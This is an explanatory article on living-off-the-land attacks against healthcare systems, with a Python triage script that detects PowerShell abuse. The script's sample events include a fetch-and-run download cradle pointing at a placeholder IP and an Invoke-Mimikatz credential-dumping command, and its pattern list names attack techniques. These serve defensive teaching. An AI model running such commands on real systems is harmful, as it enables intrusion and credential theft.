Cybercriminals use legitimate system administration tools and built-in operating system features to conduct attacks, a technique known as "Living off the Land" (LOTL). According to the Health Sector Cybersecurity Coordination Center (HC3), LOTL attacks are cyberattacks in which intruders use legitimate software and functions already available on the system to perform malicious actions, rather than introducing new malware.
This approach helps attackers evade detection by blending malicious activities with normal system operations, making it particularly challenging for healthcare organizations to identify and prevent these threats.
Traditional security measures focus on identifying and blocking malicious software. Modern attackers have adapted by relying on tools that already have a legitimate place on the network: built-in administration components such as PowerShell; network and packet-analysis utilities such as Nmap and Wireshark; and penetration-testing tooling such as the Metasploit Framework, Mimikatz, and Cobalt Strike, which is not system administration software but is often present because security teams use it for authorized testing. Because these tools are expected on the network, signature-based controls rarely flag them, and in the hands of skilled attackers they become powerful weapons.
According to the HC3 document, attackers leverage PowerShell, Microsoft's cross-platform task automation shell and scripting language, to bypass traditional security measures and execute malicious code. What makes PowerShell-based attacks particularly dangerous is their ability to operate under the guise of legitimate administrative activity. Attackers use PowerShell scripts to steal credentials, download additional malware, and spread through a network, all while evading traditional antivirus detection; the evasion is stronger still when scripts run in memory and the defender has not enabled PowerShell script block and module logging, so there is little telemetry to inspect. It becomes even more effective once attackers gain administrative privileges, because their activity is then virtually indistinguishable from routine system administration. The tool's versatility, running on Windows, Linux, and macOS, combined with its powerful scripting capabilities, makes it an ideal choice for attackers seeking to maintain persistent access while appearing legitimate.
Healthcare organizations face particular challenges with LOTL attacks because of their complex, decentralized environments with numerous interconnected systems. Limited resources and budget constraints lead many healthcare organizations to run outdated software, since keeping up with the constant updates and patches needed to secure their systems is difficult and costly. The increasing digitization and interconnectivity of medical devices opens new avenues for attack, further raising the risk to healthcare systems. A real-world example occurred in 2020, when the ransomware group NetWalker used LOTL techniques against a California healthcare institute, encrypting critical files and demanding a ransom payment. The attack disrupted the entity's medical services, forcing it to divert patients to other hospitals and delaying critical treatments.
Security teams cannot simply block administrative tools, since they are required for daily operations. Instead, they must distinguish legitimate use from malicious activity. This requires establishing a baseline of how, when, where, and by whom these tools are normally used, then monitoring for deviations from it, while ensuring normal IT operations continue uninterrupted. For example, PowerShell activity during non-business hours, privileged accounts running administrative tools from a workstation that is not an approved admin host, or remote access from unexpected locations might indicate compromise; a single such signal is often routine, so combining several before raising an alert keeps false positives manageable.
The Cybersecurity and Infrastructure Security Agency (CISA) suggests the following identification and mitigation strategies for LOTL:
When a LOTL attack is suspected, organizations should immediately investigate the suspicious activity, isolate affected systems, review logs for unauthorized access or unusual behavior, and engage their incident response team, while maintaining comprehensive documentation throughout.
Just-in-time access is a security approach that grants users privileged access only when needed and for a limited time period, rather than maintaining standing privileged access. Because LOTL attackers depend on abusing legitimate credentials and tools, shrinking the window in which an account holds administrative rights limits what a stolen credential can do.
Common indicators include unusual PowerShell commands (for example encoded or obfuscated command lines, execution-policy or logging bypass flags, and commands that download and run remote content), off-hours administrative tool usage, unexpected network scanning activity, abnormal authentication patterns, and unauthorized access attempts against critical systems.
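The two passages above (distinguishing legitimate from malicious use of administrative tools, and the list of common indicators) describe detection logic in prose. The following is an added worked example written for this article; it is not code from the article, HC3, or CISA. It runs a small indicator-stacking triage over hand-constructed event records shaped loosely like Windows process-creation (4688) and PowerShell script-block (4104) logs, decoding any `-EncodedCommand` payload so that a download cradle hidden inside the base64 blob is still matched. The business hours, the approved admin host, the privileged-account list, the pattern list, the sample events, and the alert threshold are all assumptions a site would tune to its own baseline.

```python
"""Triage PowerShell activity for living-off-the-land indicators.

Added illustration written for this article; not code from the article,
HC3 or CISA.  Events are constructed dicts shaped loosely like Windows
process-creation (4688) / PowerShell script-block (4104) records.
Business hours, the approved admin host, the privileged-account list,
the pattern list and the alert threshold are assumptions to tune per site.
"""
import base64
import re
from datetime import datetime

BUSINESS_HOURS = range(7, 19)              # assumption: 07:00-18:59, Mon-Fri
APPROVED_ADMIN_HOSTS = {"ADMIN-JUMP01"}    # assumption: where admins should work from
PRIVILEGED_ACCOUNTS = {"CORP\\da-admin"}   # assumption: accounts held to that rule

# Illustrative (not exhaustive) patterns seen when PowerShell is abused:
# download cradles, logging/AMSI evasion flags, credential dumping, remoting.
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(
        r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)"),
    "encoded_command": re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s"),
    "credential_dump": re.compile(r"(?i)(mimikatz|sekurlsa|lsass)"),
    "evasion_flags": re.compile(
        r"(?i)(-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass)"),
    "lateral_movement": re.compile(
        r"(?i)(invoke-command|enter-pssession|-computername|psexec|wmic\s+/node)"),
}


def decode_encoded_command(command_line):
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or ''.
    Matching on the wrapper alone misses the cradle hidden inside the blob."""
    m = re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""      # malformed blob: the encoded_command pattern still fires


def analyze_event(event):
    """Return the list of indicator names that fire for one event."""
    findings = []
    cmd = event["command_line"]
    text = cmd + " " + decode_encoded_command(cmd)   # wrapper plus decoded payload
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(text):
            findings.append(name)
    ts = datetime.fromisoformat(event["time"])
    if ts.hour not in BUSINESS_HOURS or ts.weekday() >= 5:
        findings.append("off_hours")
    if event["user"] in PRIVILEGED_ACCOUNTS and event["host"] not in APPROVED_ADMIN_HOSTS:
        findings.append("unexpected_host")
    return findings


def triage(events, threshold=2):
    """Rank events that stack at least `threshold` indicators, highest first.
    A single indicator (e.g. Invoke-Command alone from the jump host) is routine
    admin work and is deliberately not alerted on, so IT operations continue."""
    ranked = []
    for event in events:
        findings = analyze_event(event)
        if len(findings) >= threshold:
            ranked.append({"id": event["id"], "score": len(findings), "findings": findings})
    return sorted(ranked, key=lambda r: r["score"], reverse=True)


def _encode(script):
    """Build a -EncodedCommand blob the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (March 2024 dates; 198.51.100.7 is a
# documentation-range address, not a real indicator).
SAMPLE_EVENTS = [
    {"id": "evt-1", "time": "2024-03-12T10:15:00", "host": "ADMIN-JUMP01",
     "user": "CORP\\da-admin",
     "command_line": "powershell.exe Invoke-Command -ComputerName FILESRV01 -ScriptBlock { Get-Service }"},
    {"id": "evt-2", "time": "2024-03-13T02:41:00", "host": "NURSE-WS17",
     "user": "CORP\\da-admin",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encode(
         'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")')},
    {"id": "evt-3", "time": "2024-03-13T09:30:00", "host": "NURSE-WS17",
     "user": "CORP\\jdoe",
     "command_line": "powershell.exe Get-ChildItem C:\\Reports -Recurse"},
    {"id": "evt-4", "time": "2024-03-16T14:05:00", "host": "ADMIN-JUMP01",
     "user": "CORP\\da-admin",
     "command_line": "powershell.exe -ep bypass Invoke-Mimikatz -DumpCreds"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["id"], hit["score"], ", ".join(hit["findings"]))
```

Run stand-alone, the script reports only evt-2 (off-hours encoded download cradle run by a domain admin from a nurse workstation) and evt-4 (weekend credential dumping with an execution-policy bypass); the admin's weekday remoting from the jump host and the ordinary user's directory listing fall below the threshold. The point of the threshold is the one the article makes: the tool itself is never the signal, the combination of who, where, when, and what is.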